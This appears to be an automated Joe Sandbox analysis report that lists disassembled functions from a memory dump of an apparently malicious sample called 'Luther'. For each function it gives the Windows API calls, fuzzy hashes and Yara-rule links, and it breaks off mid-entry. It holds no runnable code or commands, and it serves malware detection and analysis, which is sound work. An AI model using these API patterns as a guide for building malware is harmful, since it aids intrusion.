Opcode ID: 70a7580742cfaa3ffbc739fe00e1fbf617aa03b8ffa1dbd96b50c58ec505311a
Instruction ID: c14cd5cc6a59791cb419007029c4c91c0fdaa80b3f366d91beffb9614eeebee2
Opcode Fuzzy Hash: 70a7580742cfaa3ffbc739fe00e1fbf617aa03b8ffa1dbd96b50c58ec505311a
Instruction Fuzzy Hash: 5931C071900219EFDF14CFA8CD89ADE3BB5EB04319F104229FA25BB2E0C771A944DB91

Function 00EAD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00EACC63,00000000), ref: 00EAD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00EAD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00EACC63,00000000), ref: 00EAD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00EACC63,00000000), ref: 00EADA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00EACC63,00000000), ref: 00EADA37

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: b9820c685e7f2e5901282b85782c0632daffd8d32d8ab8d78e4cc4b9dd21c73d
Instruction ID: c2a1e4fcf6af21b77d7268fd95a17a686571944377258576d3e62edc8334d151
Opcode Fuzzy Hash: b9820c685e7f2e5901282b85782c0632daffd8d32d8ab8d78e4cc4b9dd21c73d
Instruction Fuzzy Hash: B531AB71508604EFDB20CFA6DC84EABBBF8EB49354B10942EF406F6510DB71EE459B60

Function 00EC61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC623C
_wcslen.LIBCMT ref: 00EC624E
_wcslen.LIBCMT ref: 00EC6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC62B5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 88f7f96582f67fc559948f0e8d1253ee49b2cc595d0c5896edbe5a16c940514c
Instruction ID: ca9b9bad9d99f97748cc06cc03c21e70d9a593327d6d0c5bb0cf01ea870f41c9
Opcode Fuzzy Hash: 88f7f96582f67fc559948f0e8d1253ee49b2cc595d0c5896edbe5a16c940514c
Instruction Fuzzy Hash: 742171759042589ADB119FA4CD84FEEB7B8EB44324F10522EFD25FA280D7729986CF50

Function 00EB138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00EB13AE
GetForegroundWindow.USER32 ref: 00EB13C5
GetDC.USER32(00000000), ref: 00EB1401
GetPixel.GDI32(00000000,?,00000003), ref: 00EB140D
ReleaseDC.USER32(00000000,00000003), ref: 00EB1445

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2b92c2603e2e1bbae56b2c49ff2bb1539651661e89886d046eca4966f6b99589
Instruction ID: cd4e6d8e2a641271a64bc5b122a4216142f8113d11e13047d7173eb24f3213f4
Opcode Fuzzy Hash: 2b92c2603e2e1bbae56b2c49ff2bb1539651661e89886d046eca4966f6b99589
Instruction Fuzzy Hash: 89218B76600204AFDB04EF65CC99EAEBBF5EF88300B058479E84AB7351DA31AC05CB90

Function 00E6D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E6D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E6D169

Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6D18F
_free.LIBCMT ref: 00E6D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D1B1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b9805745285390c29f370bfa7a4ea718ce86da02873f88e2e6a628b7abcbd0e1
Instruction ID: ff8c8717c0bb2295f19f5f8c78383d60d9ccbd094a3465ccc327975f84d1bb75
Opcode Fuzzy Hash: b9805745285390c29f370bfa7a4ea718ce86da02873f88e2e6a628b7abcbd0e1
Instruction Fuzzy Hash: 8D01B572B4B6157F2321267A6C48CBB6A6DDEC3BE53580139B904E6140DAA18C0181B0

Function 00E6316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00E5F64E,00E5545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E63170
_free.LIBCMT ref: 00E631A5
_free.LIBCMT ref: 00E631CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E631D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E631E2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bb1fa15666fcb9dbd83742571fe41a535004b5285353d3095dff28dd5e241070
Instruction ID: 61e7131207c50c2a8cbd90dc2dde76465d49c47d9f5b59062660747d65c1f335
Opcode Fuzzy Hash: bb1fa15666fcb9dbd83742571fe41a535004b5285353d3095dff28dd5e241070
Instruction Fuzzy Hash: CD01F9726C6A002F96122735BC45D6B15ADAFD33F53212439F925F21C1EE32CE065111

Function 00E908FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?,?,00E90C4E), ref: 00E9091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?), ref: 00E90954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90960

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 8436aa5952a8195d85efb713e0e67987381783552f774ff16bcfebdc8ba1a2ec
Instruction ID: 00dca5fd9517ca08e795c08e706c14188f9e2df1c2b8c73d0d402382a06e87b9
Opcode Fuzzy Hash: 8436aa5952a8195d85efb713e0e67987381783552f774ff16bcfebdc8ba1a2ec
Instruction Fuzzy Hash: 9E018B73604204AFEB154F5ADC44F9A7AADEBC4796F540134FD05F2212E772DD419BA0

Function 00E9F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00E9F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00E9F2BC
Sleep.KERNEL32(00000000), ref: 00E9F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00E9F2CE
Sleep.KERNEL32 ref: 00E9F30A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 385b460d1b04d2b2dcd5360e35cf783e2db913be8ef1ec3d8360d5ef2fb9568a
Instruction ID: 28c407548266ff6335886a44f619edc925a66866679c77ed92ad26577c6a80af
Opcode Fuzzy Hash: 385b460d1b04d2b2dcd5360e35cf783e2db913be8ef1ec3d8360d5ef2fb9568a
Instruction Fuzzy Hash: 450157B1D05619EBCF00EFA5EC49AEEBB78FB08710F051466E501F2290DB369558C7A1

Function 00E91A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: f237f28eb68a818f39340cac7177faef579388ea879c05689015f9f9037a0bda
Instruction ID: b93ade463309f49d687ec6dbfbf784ff8ad85863af1063871f267745dbfd5f5d
Opcode Fuzzy Hash: f237f28eb68a818f39340cac7177faef579388ea879c05689015f9f9037a0bda
Instruction Fuzzy Hash: 1F0181B5601606BFDF114F66DC48E6A3B6EEF84364B210474F845E3360DA72DC41CA60

Function 00E91960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E91976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E919AE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e24538542a105b5bdf937ed9919c718a76eeaeffb3000fa52a2bf6d5c93c00f
Instruction ID: 4fc1e6f2c8b00c9f0ac3b0f7bd1c8b8a00b0facb8fe985ccf8a8798e116ce0eb
Opcode Fuzzy Hash: 4e24538542a105b5bdf937ed9919c718a76eeaeffb3000fa52a2bf6d5c93c00f
Instruction Fuzzy Hash: 64F06275144301AFDB214F6AEC59F5A3B6DEFC97A0F110434FD45E7250CA72D8068A60

Function 00E91900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E91916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E91922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E91931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E91938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E9194E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 578a58294ca93bee5f06a05295ab8e2e835dc08b3dcfd078532d43fd60def2c5
Instruction ID: a6991a7d0a0a8ec6657c92a5247673b50fc953d719ce63a855eebdc175c5bf4a
Opcode Fuzzy Hash: 578a58294ca93bee5f06a05295ab8e2e835dc08b3dcfd078532d43fd60def2c5
Instruction Fuzzy Hash: D6F04F75104302AFDB210F6A9C49F5A3B6DEF897A0F510434FE45E7250CA72DC068A60

Function 00EA0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CCB
CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CD8
CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CE5
CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CF2
CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0CFF
CloseHandle.KERNEL32(?,?,?,?,00EA0B24,?,00EA3D41,?,00000001,00E73AF4,?), ref: 00EA0D0C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 09092c28a7b8cbadf004a5a63a2c7405c537e88697447a7fe000b1d64df8a0ef
Instruction ID: ba15cc31bcb93f8c44f6088341eb5cc16e760ec84fac8aa98aabe4b92f3b2d8e
Opcode Fuzzy Hash: 09092c28a7b8cbadf004a5a63a2c7405c537e88697447a7fe000b1d64df8a0ef
Instruction Fuzzy Hash: 02019072800B159FCB30AF66D980816FAF5BF513193159A3ED19662921C7B1B949DE80

Function 00E965AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E965BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E965D6
MessageBeep.USER32(00000000), ref: 00E965EE
KillTimer.USER32(?,0000040A), ref: 00E9660A
EndDialog.USER32(?,00000001), ref: 00E96624

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 27f39ee63ca71a8527b54eb8bcb2fa109f94325e92f9cfa320c79978ab5f3905
Instruction ID: dab9c86f89c7c1a4f1d7eeeba8cff91fe097e1a825ef3cb9cb11c0f5202a7678
Opcode Fuzzy Hash: 27f39ee63ca71a8527b54eb8bcb2fa109f94325e92f9cfa320c79978ab5f3905
Instruction Fuzzy Hash: 52016230504704ABEF205B11DE4EF967BB8BB00705F01157AB187B10E1DBF2AA89CA50

Function 00E6DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E6DAD2

Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60

_free.LIBCMT ref: 00E6DAE4
_free.LIBCMT ref: 00E6DAF6
_free.LIBCMT ref: 00E6DB08
_free.LIBCMT ref: 00E6DB1A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c40d13b34b078e639ad82be374e61420cdbe2df6eb9e8fe653a66c5e99231fe7
Instruction ID: 1136fd3dda35b1ef1bc7364d8a67d5affebf6a0c8b7dd146ce31c88818e5ceee
Opcode Fuzzy Hash: c40d13b34b078e639ad82be374e61420cdbe2df6eb9e8fe653a66c5e99231fe7
Instruction Fuzzy Hash: 23F0FF32A8C604ABC624EB99FD81D2A77EEAF557D47956C09F109F7501CA70FC80C654

Function 00E62610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E6262E

Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60

_free.LIBCMT ref: 00E62640
_free.LIBCMT ref: 00E62653
_free.LIBCMT ref: 00E62664
_free.LIBCMT ref: 00E62675

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8436f991ffefc5e9128354f47a4d49b69664cac995746e951fe7f60e74759ee2
Instruction ID: 3dbf6423c44c8241c0af4c7b24785f0c1507baff861c8927b700849fce39df88
Opcode Fuzzy Hash: 8436f991ffefc5e9128354f47a4d49b69664cac995746e951fe7f60e74759ee2
Instruction Fuzzy Hash: 72F03A709859298BCA42AF94FC018593BEABB757D2301A94FF510F2275CB300901BFD5

Function 00E612B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 00E61469
__freea.LIBCMT ref: 00E61487

Part of subcall function 00E618A7: _free.LIBCMT ref: 00E618BF

Strings

a/p, xrefs: 00E6154E
am/pm, xrefs: 00E614EA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: c3fa42546d2495bf8a1ec80598439b185d11bbe794d6b3b89adef6aa59bfd3cf
Instruction ID: 1339068c96ba57d424913f83697798aed43668cce1314a56550477ea8b7d91d5
Opcode Fuzzy Hash: c3fa42546d2495bf8a1ec80598439b185d11bbe794d6b3b89adef6aa59bfd3cf
Instruction Fuzzy Hash: BBD124759842068ACB268F68E8457FEB7B1FF01384F2C61DAE912BB250D7719D40CB91

Function 00EB5231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 00EA41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4229
Part of subcall function 00EA41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00EB5419
VariantInit.OLEAUT32(?), ref: 00EB550E
VariantClear.OLEAUT32(?), ref: 00EB55CD

Strings

bn, xrefs: 00EB54ED, 00EB55E4

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
